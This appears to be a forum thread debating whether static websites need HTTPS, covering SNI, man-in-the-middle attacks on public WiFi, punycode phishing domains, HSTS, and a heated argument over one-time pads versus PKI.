So Google decided on the nuclear option: they've decided we're just going to get everyone to encrypt their traffic and not just with easily SSLStrip able stuff. We're going to push the standards organizations to deploy SSL\TLS in a way nobody can crack it, then we're going to provide resources like Lets Encrypt to make getting keys cheap, and then we're going to be beligerant whenever the government complains about not being able to get at the traffic.
Now all the ISP's can see are HTTPS connections to AWS, Azure and Google on their equipment; using IP's to try to figure out what site is what doesn't work. They can still attempt to MITM the traffic and replace keys and impersonate key repo's and I'm sure in a lot of cases they do, however, that opens them up to class action lawsuits and criminal hacking charges. You don't want a citizen organization charging your network architect with violating the wiretap act; Network Architects are hard enough to work with, give them a reason to tell their employer they are not going to commit a crime, and they'll end up fighting their employers tooth and nail. Both of which I'm sure Google would be more than happy to fund to protect its business.
The other advantage you get out of HTTPS is the session re-use feature. When someone re-connects to your webpage, instead of establishing a new connection, they can re-use the session they had before; this reliably tags a device and allows you to identify connections from a device even when IP's are changing, and would be more accurate than a browser fingerprint. This is not a new technology or mechanism; IPSEC IKE sessions can last years.
In all candor, we've got military-grade encryption protecting general internet traffic at this point and everyone on this forum is going to argue about privacy without understanding where the market is at or why. That speaks volumes to the times we live in and how effective astroturfing and misinformation campaigns are.
> using IP's to try to figure out what site is what doesn't work.
Every mainstream browser sends the server's domain name in plaintext at the start of the TLS connection,[0] so (short of domain-fronting, which browsers don't do) it's generally not a mystery what site clients are talking to, even if they used DNS-over-TLS. ISPs still have that metadata.
TLS session resumption could theoretically be used for tracking users, but why would Google benefit from doing that when it already uses HTTP cookies? The actual benefit is one fewer round trip, making the web, and all of their sites, faster to load.
It's far more plausible that they're pushing to secure the web with HTTPS and Certificate Transparency because an insecure web ecosystem is just plain bad for business, and makes us all more insecure. It doesn't require spite or a zero-sum game of tearing down the competition to explain pushing HTTPS and Certificate Transparency, which lack real nefarious downsides for users.
First, thanks for the link. I didn't know they implimented SNI after TLS 1.0. I had always thought TLS would initiate a connection to the server infrastructure first, then establish another tunnel in a tunnel for sites that are hosted off of the same IP. It seemed like a more sane explination to what I saw in wireshark and firewall logs. That also explains why older firewall firmware had issues with getting sites out of TLS connections but newer firmware doesn't. Looks like I have more studying to do.
I'll agree with you that there are substantial ancillary benefits to added browser security well beyond the scope of this discussion and to continuously hardening any infrastructure in general. From a business perspective, those are always worthwhile investments in of themselves simply from the standpoint good security means you have a discplined, well-thought-out system in place. But, you cannot discount the fact that Traditional Television is a direct competitor to Google and the internet in general and that is not a primary motivating factor in their decision to enforce encryption. Large companies simply do not mess with their core products for the good of the public, doing so shows the company is not loyal to employee or stockholder interests both of which shouldn't be disregarded for a variety of reasons. I'll agree companies can decide not to take things too far, but they won't disregard their own interests either. Assuming as such is a naieve belief.
They probably meant that the reason is malicious, to spy on traffic. Especially since a good chunk of the top sites on that list are Chinese which is known to have generalised spying on internet users.
However, in a shitty regime like China, surely the government can ask the websites to just hand over the private keys and disable prefect forward secrecy, allowing government spying while preventing anyone else from doing so.
Which is insanely difficult to do at scale and would take a considerable amount of time and resources. Not to mention being really obvious! I'm happy with making things crazy hard for the bad actors out there.
Please put yourself in the shoes of someone actually operating a site. Every single issue mentioned in that post only affects end-users. Not a single issue for the operator, who has many other issues that are more urgent such as turning a profit, securing that database that got wiped last week, and writing actual content. Point being that the incentive to force https for a static site for an individual site operator is just not that great.
The sad reality is that http->https redirects are like vaccination. In some specific cases they are needed (such as login pages), but for some it's more about herd-immunity (normalizing https usage and ensuring availability). Mind you that there's a solid argument for allowing self-signed certs to allow encrypted but unauthenticated transfer. This mode allows MitM, yet does protect against the threat model of a passive eavesdropper.
"Please put yourself in the shoes of someone actually operating a site." - I run 8 sites right now and one of them is processing 10,000,000,000+ requests a month. I speak from a position of experience on this topic.
"Every single issue mentioned in that post only affects end-users. Not a single issue for the operator" - so don't care about the user and the risks we expose them to, only ourselves? This isn't really an approach I'm happy taking.
With 10B monthly requests, you speak from a position of having an operations team who spend 40+ hours a week on keeping your site secure (possibly even a dedicated security team?). Most sites do not have that luxury. If you're doing that on your own, then you're far from the average site operator that I'm referring to here. In fact, most everyone on HN is not the average site operator I'm talking about here.
My poorly communicated point is that by using extreme language like "I'm going to hack your static site" dilutes the message and makes average operators less receptive to more advice in the future. Troy does a lot of good work on reducing friction and advocacy, but sometimes he puts out more extreme content like this which makes me worry that it may have the opposite effect.
PS - Do you think the vaccine analogy works? I'd appreciate some advice on how to improve it
Yes. When you make a website your obligation is to your users. Can you imagine any other engineeting field where people were willing to say "well that's a problem for my customers and not a problem for me" and think that was okay?
Let's sum the discussion up - the advantages of HTTPS on static websites is that the content can't be (1) sniffed, (2) manipulated. To which I reply that (1) the person able to sniff your network traffic is also able to see or quite reliably predict what URLs you visit, and (2) if someone is modifying your network traffic specifically, you have much bigger problem than the one that could be solved by HTTPS. And really, each time I hear "HTTPS is secure" I get frustrated, as if people really had no idea how these protocols work.
You're thinking too narrow. Attackers cast wide nets then narrow down the attack to what they've caught in the net. They don't blindly bait individual traps targeting individual users and hope they get a catch.
I'm a hacker at a local Starbucks. I go there every Thursday and use a WiFi Pineapple in my backpack. By naming my WiFi access point similar to the Starbucks' free WiFi I trick a few dozen people a day to connect through my Pineapple instead of the Starbucks provided WiFi. Over a period of a few weeks I log all traffic and devices. I see a number of regulars - many with their own unique browsing habits. I create a few phishing sites to target these unfortunate users who routinely browse at the coffeeshop. Over the course of the next few days I MITM all traffic in the shop and successfully phish a small number of the users. Now imagine a wider net. A collection of compromised networks that don't require my physical presence in a coffee shop and a small team of individuals selecting vulnerable targets based on their browsing patterns.
Neither you nor your users need to be individually targeted by some 3 letter government agency for this attack to work. They only need to be an unfortunate victim and you only need to be too lazy to spend 10-15 minutes setting up a TLS certificate.
This attack is heavily thwarted by sites using TLS certificates. I'd need to get my hands on a number of invalid certificates and even that can be thwarted by HSTS. Now instead of my attack being completely transparent I need to worry about raising suspicion of users browsing https:// sites not getting errors about invalid certificates.
Even on a completely static site one could introduce links if they can manipulate content. Create a fake blog post linking to Reddit asking for support, make up a story that a family member fell ill and please donate to your Go Fund Me. Add a cryptocoin miner Javascript. The possibilities are quite endless when you have full control to manipulate a website and an easy way to make a profit off of someone elses' reputation, audience, and laziness.
The point is, if you're able to manipulate someone else's network traffic, you will be able to modify their DNS traffic as well, and HTTPS won't help with that - you can do all these things you listed and worse.
That's why I cringe whenever I hear the mass propaganda that "HTTPS is secure". It encrypts traffic between the two endpoints, that's it.
To which browsers will warn the user that the certificate is invalid. Something that, if it was an HTTP site, the user would never be made aware of. The user would then need to ignore the certificate warnings at which point you've done your job by having HTTPS - the rest is up to the user to not ignore security warnings, you can't control that part. Having to generate false certificates at scale for an attack on a number of websites is unlikely - even with the Comodo/DigiNotar blunders of the past. Especially when arguments against these attacks are "nobody would attack me anyway" (you're only making it easier for them to target your visitors by not requiring them to jump through a hoop to get a fake cert).
If they send your user to https://dvfjsdhgfv.com (malicious server) instead of https://dvfjsdhgfv.com (your server) the browser will yell at them about the site being insecure. If they try to use http://dvfjsdhgfv.com your user can see that it isn't secure. They would need a fake certificate for dvfjsdhgfv.com to serve with their malicious version of the site. Arguing against the increased security theoretical attacks exist is a bit misguided - especially when certificates have been revoked or CA's been blacklisted/go out of business for this behavior. It's extremely uncommon - there have only been a handful of instances of it occurring/being caught (an important distinction I'm sure you'd bring up). Because of the difficulty in getting an invalid cert signed by a CA they tend to only go after the big fish (Google/Alibaba/Facebook) and hope they don't get caught quickly.
If fake certificates were as common as having an unlocked bike left in central L.A stolen, the argument would be a lot stronger.
>It encrypts traffic between the two endpoints, that's it.
Which is why it is important. The attack is called "man in the middle" and not "man at the ends". Also "mass propaganda"? Propaganda from who exactly?
I don't understand the refusal to implement https, even on static sites. It takes literally minutes and provides additional security to your readers/users. Refusal to do so is laziness at best and maliciousness at worst. I have a personal file host that receives <5 unique views/day, mostly only by friends, and 99% of all traffic only comes from me - I still took the time to set up TLS [1]. It took me under 10 minutes to implement and it was my first time ever doing so. If you expect to have 0 visitors ever why not just use localhost?
> To which browsers will warn the user that the certificate is invalid.
Only if the attacker is very, very stupid. They will happily redirect the request to paypal.com to https://www.xn--paypl-7ve.com (which resolves to https://www.xn--paypl-7ve.com that Let's Encrypt will happily give you a certificate for). The latter looks exactly like paypal.com and has a green padlock - so for an unsuspecting user it's "secure". Only having implemented DoH correctly you could talk about benefits you mentioned, without it it only gives the user a false sense of security. Seriously, people need to be aware of that.
I'm aware of that attack. I'm not sure if you're aware; but the only modern browser it still works against is Firefox.
Chrome patched in in Version 58, Opera patched it not long after. Safari and Edge quickly followed suite (or always displayed the punycode) and I believe IE has always shown punycode. Leaving the only browser with significant user share that's susceptible to this attack being Firefox. At least for users who haven't enabled `network.IDN_show_punycode` in about:config, which is probably most (if not all) users who haven't heard of this attack. Firefox is 6%~ market share - so this attack would fail on 94%~ of your viewers as long as they were paying any attention to the domain. Probably the only way Mozilla will stop dragging their feet in joining everyone else is if someone creates a malicious punycode version of Mozilla with a cert and brings the battle to their doorstep.
This isn't an argument against TLS/HTTPS - this is an argument against Firefox as far as I'm concerned.
To be clear, I'm not against HTTPS at all. I'm against exaggerating by marketing it as "secure", and on insisting on its benefits in the case of static websites, where the case is very weak.
Even if you don't use punycodes, many users are still vulnerable to another type of attack that Let's Encrypt allows:
Even without altering the network traffic many people fall victims to these vicious tricks. The big question here is how much attention do you pay to the address bar.
Nevertheless, the benefits of HTTPS are obvious - there definitely is some protection when the user is sending some data. But for reading a static website, I'm sorry, but I hardly see any benefit. I installed Let's Encrypt on all my websites, but each time I see someone calling it "secure" I really get frustrated.
Users being ignorant (not dumb, just ignorant) doesn't make it less secure. The user ignoring the security benefits or not knowing where/how to check things or being complacent and simply not checking things doesn't make it less secure. I don't have any good metaphors for it - but the problem is 99.98% on the users and 0.02% on "this could probably be better". But even with giant red warnings saying a site is insecure, an absurd amount of users just ignore the warnings and click past them (these users are also not necessarily dumb... too many legitimate programs and websites have conditioned users to just click past warnings and errors to get things to work).
Every single one of those paypal.com phishing URL's issued could be prevented if users understood how domains work. That's asking an awful lot, I know.
Security, much like any other form of personal safety, is equal parts of following protocol and being educated about the dangers. You can't reasonably protect yourself from something you don't know exists and you won't protect yourself from danger if you don't follow protocol (see also: OSHA, lab safety). If the user's understanding is that "https/green padlock = correct site!" then that's terrible, I agree. If the understanding is "https=secure!" that's better but a bit misguided. A secure connection with a malicious server probably isn't what the user has in mind when thinking "secure". But even this misguided approach is a vast improvement over the alternative of "nothing at all" which is why there has been such a strong push towards it. It's quite literally "something is better than nothing" being applied to the general population of users who will probably never be educated enough to protect themselves properly.
By your last reply I had kinda pieced together that your issue is more with the "https=secure!" generalization and not necessarily an "https isn't any more secure than http" argument.
>The big question here is how much attention do you pay to the address bar.
I check the cert for every site I visit - although if I were to become the victim of a MITM attack using DNS spoofing while in the middle of browsing a site and it was targeted directly at me... I don't check the cert on every page load so would probably be fooled for that small window. I also don't lock my front door when I go get the mail, it's a risk I'm willing to take. I understand this makes me in the 0.001% of "maybe a bit too paranoid" users - if there are even that many of us.
>But for reading a static website, I'm sorry, but I hardly see any benefit.
The benefit is very small but still existent. Simply because the time to implement is in the order of minutes instead of days/weeks - I can't see a good argument against taking the time to implement it. Even if it only ever protects a single user.
Well, it's almost nonexistent. To reiterate: if the attacker can only sniff your traffic, they will see what static websites you visit and that's it - whether you use HTTPS or not. On the other hand, if the attacker can modify your network traffic, they will attack you in million ways but using any dynamic website (i.e. requiring some interaction on your part - sending a login etc.). Such an attack on a static website doesn't make any sense when you can do so much damage everywhere else. Can we agree on that? If so, I find the past Google's policy of marking as insecure websites with forms etc. as pretty responsible and I applaud it. Whereas now it looks like blackmail on their part. And I still don't have a feeling I'm protecting any of the users who visit my static websites, I'm just forced to do that because Google rules the Internet now.
Doesn't HSTS thwart this? Unless paypal.com were omitted from the preload list, AND you had never browsed to paypal.com before with that browser, it should refuse to connect over HTTP and the attacker won't be able to issue their redirect. It will try HTTPS instead and immediately fail out of certificate validation.
That wasn't quite what they were talking about. They were talking about IDN Phishing [0] and not http-->https redirection (which is what HSTS is directed towards). But since we're talking about DNS redirection the http:// handshake against the legitimate server never happens, you're only ever visiting a malicious website (which the certificate checks would all fail - except visually in the case of IDN phishing which only works against Firefox users).
No, HSTS relies on the server sending the relevant header to the web browser. In this scenario you have total control over all servers the user connects to.
I'm opposed to HTTPS everywhere because it comes with a lot of code (like openssl) and a complicated paradigm (pki). We can do better and simpler at the same time.
Perhaps something like content based addressing, or using something like certificate transparency to protect site contents.
The problem with https everywhere is - for all its good aspects - it adds a layer of fragility to the web. It seems like we're leaving the day where a website can simply be, untouched, for decades. Now if you don't update your TLS certificates every few months, the thing goes poof.
It would be nice if there was a good way to publish content to the web without having to tend it constantly.
The only way you could do that is on a hosted platform where they do maintenance for you. There's no way a server would last online for decades without being patched, it would have been hosed countless times over by now.
Installing certs is just as regular as installing patches, do it every 6 months if you like, but certainly not every 10+ years!!
One-time pad requires a pre-shared key of the enomorous length to be effective in the World Wide Web. An impossible plan can be vacuously better and simpler at the same time, guaranteed.
The issue with one time pads isn't their security. That's fine.
The issue is key management. Both parties need the same key and it has to be at least as large as the data you want to send. Each set of parties needs a different key.
If you had a method to securely transmit such keys then you could just transmit your data over it instead.
This is why one time pads are only used by countries to communicate with staff overseas. You can send the pads by diplomatic courier for use in communication later. There is no equivalent mechanism for your web activity and every site on earth.
Yes there are. The two parties need to agree on a common source. It can be a file somewhere on the web (an image) or a something that doesn't exist yet.
How are the two parties supposed to agree when they've never talked to each other before?
If I connect to https://www.SomeWebsiteIveNeverVisited.com/, how is the web server supposed to tell me where to get the key? Or if I, the client, am choosing where to get the key, how do I securely tell the server where to get it?
Passwords work because they're being sent over TLS which we've decided is "good enough".
How is a one-time pad going to fix the issues in TLS?
Honestly, it feels like you're treating "one-time pad" as a buzzword without understanding what it actually is. It's just an encryption technique. It doesn't fix the PKI problem. And your one-time pad key needs to be sent over a secure channel. How do you suppose that happens?
You admit that you're not into crypto, yet above you tried to propose a solution to the problems with PKI, as if the people that ARE into crypto hadn't thought of it.
You show your values and you prove nothing with that sentence.
Experts are often wrong. They exist because because we don't know. When we know something we don't need experts anymore. We just know and apply our knowledge.
Keep in mind the context of this whole conversation. You suggested one-time pads as a solution to PKI and the problems of OpenSSL's large code base being added to projects that need encryption. I don't know how to put this nicely, but it just shows you really don't know what you're talking about.
Yes, sometimes experts get it wrong. Yes, non-experts can sometimes find solutions that the so-called experts couldn't find. I'm not arguing against those claims.
But suggesting one-time pads as a solution to PKI is like seeing someone on the side of the road with a flat tire and suggesting they refill their gas tank.
People have the right to criticize whatever they think is a problem. They don't need to be competent. It's just their applied freedom to think. I just mentioned my lack of interest in crypto to prevent what happened but I'm not surprised that it was useless.
IMHO most people defending HTTPs do that by loyalty because they invested so much time on that and not because they understand all the details of the crypto behind.
My message is just: "It's overcomplicated. I quickly found an alternative. I don't buy the meme".
> My message is just: "It's overcomplicated. I quickly found an alternative. I don't buy the meme".
That's exactly my point though. Your proposed alternative does not solve the problem.
We didn't reject your alternative because we think you're incompetent. We didn't reject your alternative because we think HTTPS is fine.
We rejected your alternative because it DOES NOT SOLVE THE PROBLEM. AT ALL. And rather than admit that, you keep defending a point that nobody is arguing against.
Earlier, I asked you a question to try to lead you to understand why your proposal was wrong, and you told me to answer my own questions and called me patronizing.
You continued to defend a point (OpenSSL and PKI have problems) that nobody argued against.
Even now, you keep acting like I'm telling you wrong simply because you admitted you're not into crypto.
And you're calling ME dishonest?
I give up. At this point, I'm quite certain I'm being trolled. Or you think being told you're wrong is a personal attack. In either case, you're not worth my time.
Yes you are. Look at your messages and mines. You're the troll. You use "?" and upper case a lot. I don't. You always try to change subject instead of agreeing on the problem. It's a lack of integrity.
You feel threatened because you invested time in those tools. It's not rational. It's an emotional reaction.
I use question marks because I'm asking questions. By having you consider what the answer would be, it would lead you to understanding why you were wrong, rather than me having to be explicit. It is an attempt, albeit possibly a poor one, to teach you something by getting you to think about it, rather than being told. If you would rather I just tell you why one-time pads don't solve the problems of PKI and the additional code bloat of using OpenSSL, I will gladly do that.
I use upper case because your responses are frustrating me, because you continue to insist that your suggestion is being dismissed simply because you're not into crypto, when I have said over and over that it was dismissed because it is simply not a valid solution to the problem originally brought up.
Your claim that I keep trying to change the subject instead of agreeing on the problem is baffling me. Which problem are you referring to here?
Maybe I'm just entirely misinterpreting your messages, because you're never specific about what you're trying to refute.
> It's an emotional response.
An emotional response to what? Please be clear here. Are you still thinking the rejection of one-time pads as a solution to the problems of OpenSSL and PKI is not based on logic or merit, but somehow based on emotion? If the answer to this is yes, then just come out and say so, because I would gladly explain what is wrong with your proposal.
> IMO you just wanna be loyal to the group you think you belong to (you said "we")
What group do you think I'm trying to be loyal to? The fans of OpenSSL? The people that believe everyone should use HTTPS?
> You don't want to admit your part.
What "part" am I supposed to be admitting?
> You just justify your feelings.
...and?
> If you feel threatened, it's your problem.
I don't feel threatened. Why would I feel threatened? You're the one that is acting persecuted for having a proposal get rejected.
OK Daniel for the flamewar but I have been correct. I only replied. Some people are aggressive. I just said them they are and how they are. They don't like that et it continues endlessly. It's not possible to be a gentleman in those cases.
At the risk of re-igniting the flame war, I want to explain why one-time pads are not the solution, because you kept insisting that I rejected your proposal because I wanted to be loyal to the pro-HTTPS crowd, and not because one-time pads won't actually work.
If you find this patronizing, I apologize. I do not mean to be. But you admit that you're not into crypto, and so I'm assuming you don't understand why your proposal wouldn't work. At the very least, I don't know what you know and don't know.
So, as mentioned, supporting HTTPS on your site adds the problems of OpenSSL's large code base, a history of OpenSSL vulnerabilities (Heartbleed being very well known), and the problems of PKI. These are all well-known, and are deemed an acceptable risk because the risks of NOT using HTTP are much higher.
Now, one-time pads definitely have a lot of benefits. First, they're the only algorithm mathematically proven to be unbreakable when used properly. They are extremely simple to implement, and using them for encryption instead of having to choose between the dozens of algorithms that OpenSSL uses could reduce your encryption library's memory and storage footprint.
Of course, the big caveat here is that they are unbreakable when used properly. This means:
- A pad can never be used more than once -- If a pad is used twice, then an attacker that has sniffed two encrypted messages can derive the pad, and therefore decrypt all message encrypted with that pad. This derivation is quite trivial, especially for text data. (see https://crypto.stackexchange.com/questions/59/taking-advanta...)
- The pad must be at least as large as the payload -- If the pad is too short, you have to repeat the pad, causing the problem mentioned above.
- The transferring of the pad needs to be done over a secure channel -- You have to assume that an attacker is always listening and can see all traffic. Even if the server tells the client "Go get the pad from this URL", then the attacker will get that URL as well. Also, keep in mind that the pad needs to be at least the size of the data being sent, which means that if you have to fetch a pad, you're doubling all bandwidth requirements.
- The random number generator used to creating a pad must be cryptographically secure -- Being able to predict the supposedly random numbers another system is generating is a pretty known attack and has had several proofs of concept. Generating the amount of cryptographically secure numbers to create a one-time pad large enough for transferring very large amounts of data just isn't feasible.
- One-time pads do not solve the problems of PKI -- One-time pads do not offer any method of authentication. They're nothing more than a form of symmetric encryption, and symmetric encryption does not attempt to solve the problem of authentication.
That's basically the gist of it. If you want me to explain anything better (Like what symmetric encryption is, and how it differs from asymmetric), I'd be more than happy to. I'm not a crypto expert by any means, but I like to think I have a strong grasp of the basic concepts and ideas.
So in airports I rack my brain for a website that might serve content over HTTP, not HTTPS. Alas, they're getting harder to find, and it's getting harder to keep those airport wifi sessions going. I half considered registering "alwaysinsecure.com" or "alwayshttp.com" so I could reliably find one... Now I'll probably just use qq.com, it's short and easy to remember.
EDIT: Thanks all :-)